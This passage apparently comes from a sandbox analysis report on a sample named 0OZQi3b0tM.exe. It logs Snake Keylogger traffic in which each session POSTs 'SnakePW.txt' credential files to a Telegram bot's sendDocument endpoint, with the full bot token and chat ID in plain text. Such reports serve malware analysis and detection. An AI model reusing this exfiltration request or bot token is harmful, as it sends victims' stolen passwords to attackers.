                                                                    2022-06-26 07:33:22 UTC175OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 63 31 38 63 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756eec18c9cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:23 UTC176INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:23 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:23 UTC176INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66863,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228803,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    105192.168.2.549952149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:23 UTC177OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756eefd27b9
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:23 UTC177OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 65 66 64 32 37 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756eefd27b9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:23 UTC178INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:23 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:23 UTC178INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66864,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228803,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    106192.168.2.549953149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:23 UTC179OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ef33fcf5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:23 UTC179OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 66 33 33 66 63 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ef33fcf5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:23 UTC179INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:23 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:23 UTC180INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66865,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228803,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    107192.168.2.549954149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:23 UTC180OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ef6f989b
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:23 UTC181OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 66 36 66 39 38 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ef6f989bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:24 UTC181INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:24 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:24 UTC181INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66866,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228804,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    108192.168.2.549955149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:24 UTC182OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756efad95ba
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:24 UTC182OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 66 61 64 39 35 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756efad95baContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:24 UTC183INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:24 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:24 UTC183INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66867,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228804,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    109192.168.2.549956149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:24 UTC184OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756efe20a71
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:24 UTC184OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 66 65 32 30 61 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756efe20a71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:24 UTC184INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:24 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:24 UTC185INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66868,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228804,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    11192.168.2.549779149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:42 UTC18OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d6ea0e18
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:42 UTC18OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 36 65 61 30 65 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d6ea0e18Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:43 UTC19INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:43 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:43 UTC19INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66757,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228763,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    110192.168.2.549957149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:25 UTC185OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756f0200579
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
